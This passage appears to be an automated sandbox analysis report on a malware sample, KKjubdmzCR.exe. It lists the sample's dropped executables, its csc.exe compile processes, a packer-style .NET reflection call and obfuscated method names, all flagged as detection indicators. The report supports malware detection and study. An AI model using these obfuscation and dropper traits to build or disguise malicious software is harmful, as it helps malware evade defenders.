Static PE information: Virtual size of .text is bigger than: 0x100000

Source: KKjubdmzCR.exe

Static file information: File size 4257792 > 1048576

Source: KKjubdmzCR.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x40f000

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: KKjubdmzCR.exe, KKjubdmzCR.exe, 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Bootstrapper.exe, 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmp, Bootstrapper.exe, 00000003.00000003.1817467071.00000000071B4000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000003.1816251543.00000000068AD000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000000.1813269853.0000000000E33000.00000002.00000001.01000000.00000007.sdmp, Bootstrapper.exe0.0.dr
Source:	Binary string: System.Runtime.Serialization.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Core.pdbP source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Data.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Xml.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.ni.pdbRSDS source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000348000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Data.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Data.ni.pdbRSDSC source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Configuration.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: \??\C:\Windows\System.pdb source: BootstrapperV1.23.exe, 00000008.00000002.2156401668.000001907D6A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Xml.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.pdb source: BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000348000.00000004.00000800.00020000.00000000.sdmp, WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Core.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Data.pdbH source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Numerics.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Xml.pdbH source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: mscorlib.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Drawing.pdb/ source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Drawing.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.pdb source: componentreviewsavesSession.exe, 00000016.00000002.2128695870.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Core.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Runtime.Serialization.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: namem.pdb\ source: BootstrapperV1.23.exe, 00000008.00000002.2156401668.000001907D6B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Numerics.pdb` source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Configuration.pdbP source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Numerics.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER8DFC.tmp.dmp.17.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, TCF9s2mMGQrBwEfst4M.cs

.Net Code: Type.GetTypeFromHandle(P1hRKGQuG2nXlxgqjVL.K2JgTlrXT18(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(P1hRKGQuG2nXlxgqjVL.K2JgTlrXT18(16777245)),Type.GetTypeFromHandle(P1hRKGQuG2nXlxgqjVL.K2JgTlrXT18(16777259))})

.NET source code contains potential unpacker

Source: 0.2.KKjubdmzCR.exe.4017cb.3.raw.unpack, DynamicUtils.cs	.Net Code: CreateSharpArgumentInfoArray
Source: 0.2.KKjubdmzCR.exe.4017cb.3.raw.unpack, LateBoundReflectionDelegateFactory.cs	.Net Code: CreateDefaultConstructor

Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.cmdline"
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.cmdline"

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

File created: C:\monitordll\__tmp_rar_sfx_access_check_5131828

Jump to behavior

Source: Bootstrapper.exe0.0.dr

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 1_2_00007FFD9B62A272 push ebx; retf	1_2_00007FFD9B62A282
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 1_2_00007FFD9B6100BD pushad ; iretd	1_2_00007FFD9B6100C1
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 1_2_00007FFD9B62D668 push ss; retf	1_2_00007FFD9B62D837
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E1F640 push ecx; ret	3_2_00E1F653
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E1EB78 push eax; ret	3_2_00E1EB96
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Code function: 8_2_00007FFD9B624B38 pushfd ; retn 5F52h	8_2_00007FFD9B63E0B1
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Code function: 8_2_00007FFD9B6200BD pushad ; iretd	8_2_00007FFD9B6200C1
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Code function: 8_2_00007FFD9B636098 push eax; ret	8_2_00007FFD9B6361DD
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Code function: 8_2_00007FFD9B634800 push ebp; retf	8_2_00007FFD9B634801
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Code function: 8_2_00007FFD9B62DDF8 pushad ; retf	8_2_00007FFD9B62DDF9
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 22_2_00007FFD9B64537C push es; ret	22_2_00007FFD9B64537F
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 22_2_00007FFD9B640AD3 push ebx; retf	22_2_00007FFD9B640B1A
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 22_2_00007FFD9B644730 push edx; iretd	22_2_00007FFD9B644733
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 22_2_00007FFD9B645323 push edi; ret	22_2_00007FFD9B64532E
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 22_2_00007FFD9B640AFB push ebx; retf	22_2_00007FFD9B640B1A
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 22_2_00007FFD9B6409B0 push ebx; retf	22_2_00007FFD9B640B1A
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 22_2_00007FFD9B7B68B9 push ecx; ret	22_2_00007FFD9B7B68BC
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 22_2_00007FFD9B9E32CE pushfd ; retf	22_2_00007FFD9B9E32D0
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 22_2_00007FFD9B9ED91B push ecx; ret	22_2_00007FFD9B9ED91D
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 44_2_00007FFD9B63537C push es; ret	44_2_00007FFD9B63537F
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 44_2_00007FFD9B630AD3 push ebx; retf	44_2_00007FFD9B630B1A
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 44_2_00007FFD9B634730 push edx; iretd	44_2_00007FFD9B634733
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 44_2_00007FFD9B635323 push edi; ret	44_2_00007FFD9B63532E
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 44_2_00007FFD9B630AFA push ebx; retf	44_2_00007FFD9B630B1A
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 44_2_00007FFD9B6309B0 push ebx; retf	44_2_00007FFD9B630B1A
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 45_2_00007FFD9B658158 push ebx; ret	45_2_00007FFD9B65816A
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 45_2_00007FFD9B63537C push es; ret	45_2_00007FFD9B63537F
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 45_2_00007FFD9B630AD3 push ebx; retf	45_2_00007FFD9B630B1A
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 45_2_00007FFD9B635323 push edi; ret	45_2_00007FFD9B63532E
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 45_2_00007FFD9B630AFA push ebx; retf	45_2_00007FFD9B630B1A
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 45_2_00007FFD9B6309B0 push ebx; retf	45_2_00007FFD9B630B1A

Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, rPsLvVTW0qaBPOORG9d.cs	High entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'kuTt3T1NUOe', 'zeitItADZg9', 'IROZa3t62xK7tNx6qHdf', 'ovVK9Ht6raSGNw9L386K', 'CsxhCet6AZ1SYHwKBLjN', 'XUlSN6t6Hju1AXJ3VSdN'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, gWVUCt7XOqFwsWBDwO2.cs	High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'XESt3eJRPLi', 'd6NtIE9YQ2K', 'KYhmFCtjna9X52BlspQt', 'NTHxQbtjcnU88RN5C3kl', 'kCCukltjD719hqb7poA3', 'V6X0PStjp9GwjS4NOYLy', 'aJjHYntjjd7JMTHo9dSf'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, MPXo5NQpbvPNkCNSWD5.cs	High entropy of concatenated method names: 'lErtdxCLmJH', 'nDHtdhbG28Q', 'XVPtdlgOYcl', 'paUtdNVdB7r', 'r48tdniwncD', 'ptXtdcd5neT', 'nXDtdD2QDZA', 'gDe9TCOVve', 'nvDtdpeoYnq', 'lOwtdjtEuOl'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, el7k02fFjoi1810fC9x.cs	High entropy of concatenated method names: 'iyOfawPUY2', 'lNmfZZUhLm', 'CuYf8oIJpN', 'CPuf0AwG19', 'Y4cfR9iKI3', 'JF8wkXt88OOxeXLAv7Zt', 'lW45Xtt80JrHP3BK6PKl', 'javlM1t8RDoJCXamm7R9', 'OUZknJt8aU9n3leQ12U7', 'CSKKm5t8ZSbZajax9bde'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, fkZMIyzPnt2ifgtTG9.cs	High entropy of concatenated method names: 'vaLtt1TEdg', 'QeNtLassKD', 'mQ9tISJg4k', 'GZJtTZ8Ona', 'LHbtd8P7hp', 'T6qtvYMbQp', 'PfVtWH3Eav', 'IWhGgotq3W6VJYU0jiOJ', 'e1gC0stqW7jc8HvBwxkZ', 'MSdNyytqiCRrRDFr7tGk'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, dM5JCIg6BgfXNm6wrWd.cs	High entropy of concatenated method names: 'uP6g4tX91C', 'VnugYX84Xf', 'tTC1nitPYqX6cg91LmJa', 'IsO1dStPjnZJ62ZNK4AN', 'MxdQjjtP4pVYcrLHlNdG', 'iPTvUCtP10JD05ccZHXD', 'EtLgaIJHVU', 'CaGyqotPZJykpDRTql4R', 'cps4LStPEDqPmckG1MqL', 'USCSGQtPacsLdlCw5TL4'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, qMWqtKSsAcYcNnvpfFD.cs	High entropy of concatenated method names: 'vSVSSvo96Y', 'petSGgBseY', 'FkVSqUu7Xk', 'dbvSP3Dmxk', 'lW4S58S1qC', 'aAUEvOtFzWnvXbhi7WIJ', 'tuKGSltEwus8TwUmajh9', 'k0kCgHtEtX3iAYMKncdm', 'okvSNFtEgNcO2p63i7xC', 'pIDMtrtELs9kEcw8JIcD'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, f7Qwbs2DanGygDsOgve.cs	High entropy of concatenated method names: 'N2N', 'xuqt3UsmcSF', 'bIa2jarBNr', 'zG8t3OxI4uH', 'G43Lhxt4598PfnvIadii', 'vvsJ7kt4fU911lDsGRiY', 'a5yr31t4qV2AbnFCBXM2', 'NhSOEyt4PHRpuqaoPLmc', 'WwVhrtt46DQ9c4TFFmeW'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, mvJM7WvtG7CIyBkXjwb.cs	High entropy of concatenated method names: 'rpevL0BtrE', 'GZKvIabAVB', 'slrvTirS7K', 'stW75KtheQVKAkLtAwoI', 'BkHIZYthCxhBL2ylLPR7', 'JOUWgNthbitXQibC0Mx6', 'o8nbvwthuXRc797H2apT', 'Fl9MfithUP4GYvTd5jXg', 'PBqy0VthOuMtbOBh975a', 'SXh7LUthKw2DNXMYJIWK'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, qX7AM2rTB3C3N298AJb.cs	High entropy of concatenated method names: 'method_0', 'method_1', 'K47', 'vHXrvmn744', 'vmethod_0', 'BKdr3kcILr', 'Vrwt3rYmU6f', 'nsJYIptYwLmnf6pr14a4', 'TLRhflt4951xJGWD31Dj', 'qMl1NZt4zpAPWKHIERU7'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, cBUeD8TOPVROw2lT25e.cs	High entropy of concatenated method names: 'YkuTqkP7FF', 'TiwTP3etkD', 'ocBT57grFl', 'QOlOWWt61KPvYXvsMVUd', 'EYtowrt6FuNnf0LZ2cmD', 'yV7WD3t64oyI4mckXFFy', 'CBrwhOt6YH0GXDmTkKgC', 'N7hTsUQ0Jb', 'gmmTVCtwpX', 'zjjuJ0t6pKLAoWND3xJb'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, W3I7TDsibd3na2yQtTT.cs	High entropy of concatenated method names: 'eaNs6g33X4', 'lYHsbIRPZw', 'FekseiyWpG', 'XivsuEgYye', 'oS4sULXscm', 'cftsOkw3hO', 'nX7sKjgewN', 'ymisMKm3RV', 'moCsBptlp5', 'QB3s74lr2U'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, dYErTJL0T6hZXjqG7IP.cs	High entropy of concatenated method names: 'sLtILn8f7w', 'yYbIIql594', 'SheITtWpiZ', 'mh0RjYtfdVcKK8WL7iXT', 'W9JUiKtfIIgI5UcaVLuO', 'aJJdgHtfTPejVtLOf0oC', 'fJIIC3Lgln', 'D6tmMvtf3tGBFLkBwNN2', 'aBDPxAtfWoEgFtrDgZjQ', 'xbHSsytfi1rgMWDaiCY1'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, S9wFYSqLqCGymFxgLr9.cs	High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'xcTqTj4INY', 'Write', 'zNsqdxbDGG', 'BF7qvBqX4x', 'Flush', 'vl7'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, ykrf1WlcJ2wW4X3PBLF.cs	High entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'rkClp4qJEY', 'uucljBOpgJ', 'Ei7l4tY61k', 'uv3lYIPhVF', 'Oodl14GfZt', 'qyMlFiOAeQ', 'L6ISfftRmvtAuPrygsur'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, KLG0GpXc6M15PNafZFS.cs	High entropy of concatenated method names: 'Pyst3GSpxs8', 'OpGtdSxfs4n', 'ILuhjCtm2Cx5j1XQaUfC', 'WtpHjQtmBBiT9mZXDhN2', 'PQsJQktm7BahCdyDuNlg', 'F9ROKxtmrG0q7uOZO6xp', 'c5w0JdtmVynZFyQEroUe', 'LMFf62tmHBqXuBcjwwTG', 'oeVPWYtmsVPRSuyTJOf0', 'imethod_0'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, AvhqgU2uC3mvV382oIp.cs	High entropy of concatenated method names: 'tkh2298DyW', 'y3Sm9Vt4WXi1W0Ue2ZCh', 'qmid1Ct4vD7fDs76jkZF', 'hommxYt43ryuvk2W5Tkk', 'RHV1WYt4ieLB4xRJPhXE', 'WxR2OMfuMT', 'FmngbSt4txAbs6DNkplA', 'bw6hyGt4gBQfJxlNpivp', 'T7DgIpt4L4Z0bl90yq97', 'cCa89wt4I6mMFkwpb71i'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, tjqZnBh0uoAYbSQ3NBP.cs	High entropy of concatenated method names: 'ikXhoFLfF8', 'k6r', 'ueK', 'QH3', 'B59hX9HTkY', 'Flush', 'FVOhJK5Z8Q', 'hUrhkpIdIU', 'Write', 'dPMhmFR5o2'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, lVI0s95jC2ti5IUc0hR.cs	High entropy of concatenated method names: 'Xus5Yyul2Z', 'GgQ51hFRTe', 'Mf05FA6UJl', 'xd15E6pSYK', 'kgR5aegm5J', 'oKK5ZmUZS3', 'IFo58bI9Ut', 'Vep50VDgIu', 'nXt5Rpio9o', 'Gql5o6qBbW'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, XXUqj5XGK1eYFUfF2dm.cs	High entropy of concatenated method names: 'Dk4t3S7l6qO', 'f1rtdrC7SgU', 'yQ8', 'K9m', 'BSiQrOtkaylbCZOFOCOF', 'nfv2AwtkFopts0ucUIDu', 'TFoOGstkE01bPfKRVr0x', 'WMEHYutkZViJYJoZCNcp'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, nxx9VNM05sJXdIp6bZ.cs	High entropy of concatenated method names: 'v69l0rYoC', 'JIQ1VotGxXC1dvXVOKyf', 'hlyBOetGhG1cGNs8U941', 'DvQuiptGfYCICgkl8mfF', 'pUjONWtG6ZelUYQ3EBSj', 'eW97O7ycZ', 'tKM2OFJ0P', 'Ol6r1eev6', 'IMVAG1R8U', 'HIaHqZWYF'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, TCF9s2mMGQrBwEfst4M.cs	High entropy of concatenated method names: 'jdjaDrtQu50gUj65BCMs', 'uJOo78tQU0sho1lXT7Pa', 'Wy0yX3eYW7', 'XTMPxZtQBHO6wjgrM6dF', 'cxUJnItQ7j20AcQOZevL', 'jXZ9K4tQ2a9NgHka3tyP', 'bHVKjktQru6Eurx0QBFS', 'tBIWWvtQAfVxONanNE4v', 'EV39sZtQHBdaTdpV2WSK', 'T6mQDwtQsxIibSO9dlDp'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, lob2GsWs7p4XUDPV8Hi.cs	High entropy of concatenated method names: 'fNdlshtcJX4hDpbRjmrA', 'rsdJbNtck53CBjbC3A3G', 'v0Uu9VBLHC', 'nHB0sutcynsdHUDiOA4R', 'hXd7igtcQl2J2EmYPuDr', 'w4JBFqtc9sIETD4Lc0yw', 'IhHUtNNGt9', 'LyQhvAtDgXYJoTMvd13R', 'nhFnHFtDwJ9Yy9eIMX20', 'PAsdMKtDt3odbg1bNFaB'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, RKCphap60gZKTS0Zpcu.cs	High entropy of concatenated method names: 'MpsphvAHZu', 'Qj1plscHRv', 'IGEpNuUBAe', 'HWOpnBJaIs', 'uHppcGuH3b', 'bNXpDmHZFS', 'BVwppRAtry', 'tr3pjQENyx', 'bnYp4N1NkU', 'yLipYdbEYS'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, BnDofarOKOCMJJflrse.cs	High entropy of concatenated method names: 'THbCsntYGvK3p2uNvVcg', 'BJjbditYqRCwCO3aF8BX', 'xC27dNtYVSkL0ijbDUPl', 'pnmOa1tYSNxrCucdLPQU', 'method_0', 'method_1', 'NbZrMlF9KX', 'E4wrB1dFXI', 'jwBr7KHYfI', 'WLer2T2NGS'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, Ya4Qg3sRl7wqPBKZ7OF.cs	High entropy of concatenated method names: 'xMmsXLyhn9', 'IAbsJdkxkc', 'lG6sk3ON7p', 'vxAsm9Qj6S', 'RoHsyXr0OJ', 'b8MZnDt1zLI5rlnDHmxT', 'tuivGKt1Q3y5exBE23V1', 'MYLQCwt19o1XcQe1E1JV', 'aSO9SItFwSTD7hJI5YPH', 'uwZIRBtFtaSK5FAs2ADE'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, JjKmHdv6s5kc1I4fyDP.cs	High entropy of concatenated method names: 'KvXvhHvUdR', 'TsPvlQnXr2', 'uEJV1bthkQHHDJC8oChn', 'tnPpc0thXxlsFVkdbcem', 'FZo9o9thJRy1W31Eym6G', 'OUneXtthmDoU4JajoUyx', 'lwqT6Sthy2lKontoG4jY', 'ghNtVythQQB0sF0pciFc', 'BccUY7th9u07Q3xpy5bg'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, EKMpNKPEinNMiGkaWuP.cs	High entropy of concatenated method names: 'o7JPZXE65y', 'oEQP8NDBOn', 'bPqP0uow9L', 'OiXesStaFUK0ojP9Tu46', 'NLcKictaYd0pWZTUdaUb', 'yEWC9xta1DruQU9pyCAn', 'ke5pvNtaEGUVuuWBJcZn', 'IX8rVBtaa9sRADlXGtdT', 'hFVRQjtaZa63r956Hfh0'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, dQLWdY7PrHbXvtvv1q1.cs	High entropy of concatenated method names: 'BOu7nroBxU', 'VYvWZZtjMj0d5OAgRfZQ', 'wbNOIMtjBfJVbI3QxIAJ', 'yYGUGatj7MuxdiiUBHyb', 'vBG7fqhPCI', 'M3s76ly3Sl', 'cPb7xyc31c', 'dvZDQxtjOl1YIcMWjBjt', 'JKOsBatjuPCf8I4r5ogP', 'dnkVyPtjUXRSEhCEteET'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, OU6m1aDFxO2GdtsJ3ce.cs	High entropy of concatenated method names: 'Ghot3VXEc9d', 'nU2Da03Y97', 'LobDZMxRaB', 'APiD8cgya4', 'YpbFS5tXD6aLLjtYlnnC', 'ANoAXytXpBhL8xa9NTYC', 'kWRO2AtXjTyiWeaIbct6', 'VPTnmwtX4bsyf6sfjlHw', 'iRHc7ttXYkUy89r5oKtl', 'bd72brtX1SFbVR8m8bTP'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, yb9H7Cl0WUoZCFUYLZR.cs	High entropy of concatenated method names: 'FkCk1CtoOB3ALuo7TsNh', 'kl4McXtouWuoY0qWLG8Q', 'BCkr6MtoUhaJIxtwb6jy', 'sdjKTutoKKiRlqY0wh7O', 'yJ4loxbI6q', 'Mh9', 'method_0', 'ywglXYih5w', 'oGilJ7ItJF', 'tZYlkljtZJ'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, Puyud0T1q0vvVH0v1rA.cs	High entropy of concatenated method names: 'xrVT8fuHs6', 'pNup5Qtxd3U0Byss52kH', 'LXYOrJtxInqdWwysCKUE', 'BREEt8txTv1IY77sZhGt', 'UXFFVUtxvWWOeY3PrfRV', 'ALrEFItx3WvBtUw3DNYO', 'U1J', 'P9X', 'srltIOcTwMX', 'GZ6tIKRcXMj'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, FIjPobAe0iH6k8mFtRN.cs	High entropy of concatenated method names: 'rOrst1oh1X', 'EEDuWSt1hlI3e01HAgWc', 'EYY0yFt16DjUQQmrYboy', 'um69cCt1xmbe1K767FKx', 'thFAUNrtQj', 'rFVAO9vLgx', 'QsoAKfUlyP', 'eWUAMFCF7W', 'U0yABq0koy', 'AOYA7XCX22'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, N5fsLY3QSY08I2pYLV4.cs	High entropy of concatenated method names: 'P9X', 'imethod_0', 'lMl3zU33eY', 'zOUK0ktNrqLWMbc7sjn1', 'HuyOeXtNAE1iKwWU0F5g', 'lfo8bMtNHWeH2HpcJ9ZJ', 'Xj7SpStNs7CGLBUHfFja', 'v33CobtNVNsgGJOhaHI5'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, kXYBjZ3KrAG63lZsJ4C.cs	High entropy of concatenated method names: 'llK32xQwmF', 'kXLcXJtlpbPhpH2L8lZl', 'NOJw60tlcuWE6PlU9maL', 'VoNpDKtlDFxkxfm0q6as', 'd9x5CltljJ0ba2UUyPAu', 'SNd3BZkOXq', 'xgvbfUtlhf0Bq8Q8kMYC', 'TvyoqBtllLBu1TxYTq71', 'Qp4m6dtl6g79unDHZPIL', 'kUqevrtlxAVuCbe45tea'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, Vobax9v4PS14DN99cyl.cs	High entropy of concatenated method names: 'RBpvkkRS6k', 'JCKvmUo07O', 'HypZrvtlbqGlhkkvJvOS', 'GEwu9atliGBNiRTLlXFj', 'pL2sqGtlCEVgk8wfUjRj', 'ucIpQatlevrsbO9SmdoS', 'PVIv1kgZ9m', 'dgWvF8Ys6k', 'rTOvEtoMtu', 'FWavacJeww'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, RKZbqev7IBB7YMaDxX0.cs	High entropy of concatenated method names: 'uhbvPySaTa', 'jeIHvrthZbNNnhNlNrC9', 'z8Dwk8th8q5fY9GfBoan', 'B1SfQIthEkL48RMIAeBO', 'SQ5LqcthaAL2gQe7HMZy', 'eLG3Mbth0CtdgxJFtYal', 'lBNWoEthRKGgGJhFVl1N', 'E1TvrqhS6v', 'NAsvAhNZPV', 'NXVvHJD4hl'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, NHVq8dTR8kXdGeBgcr6.cs	High entropy of concatenated method names: 'MArTyXrGn8', 'iqLTQQbgVg', 'eemT9OtWfr', 'SRlTz1DN0A', 'KGWdwnXrBG', 'sbCdtIW5NO', 'B2wdgVR4U3', 'nJwHrTtxMLfPWA9VEwJ8', 'oqv5FptxB9p92BSIV3aI', 'y0vVeHtxOlM9YboDC1gO'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, vEKOwrQBFvEC5q3wlNG.cs	High entropy of concatenated method names: 'mo8Q5B1P73', 'cyKQfYEe0r', 'UnlQ6tfRoa', 'SBPQxSvjL0', 'uiMQhqAva9', 'kO8QlJLuPf', 'MGOQNxICaa', 'gxSQn6J68e', 'dGBQcW0fmR', 'pERQDlTaWV'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, ksFjAld4NVG3PhLNOEZ.cs	High entropy of concatenated method names: 'oYvdkZ1oDl', 'PLIdmjGsgp', 'T46dy7pMZe', 'rlaYkgth3fEFsBAv6wFe', 'WiTOIHthW16km1E4IAYR', 'rX2fVWthdJivkaS4TXo4', 'M1CZOIthvJB3cBsVC6n0', 'tEbd1nIp21', 'ff2dFkBWh3', 'UjgdEEvbpB'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, bHg3gTLG9tkgsbej8tF.cs	High entropy of concatenated method names: 'CfmLY9tY6G', 's6yL1j7avy', 'MNrLFC6Bxs', 'jVdM3Ct54aLKL77V66Nv', 'Rnqgxit5pMyJxZxdgTTo', 't55llVt5jsZ7Z1CVXxTC', 'KPReW3t5Yck955mLo6x6', 'PnWLP0fTng', 'sToL5c3hiI', 'ejALfXQXv8'
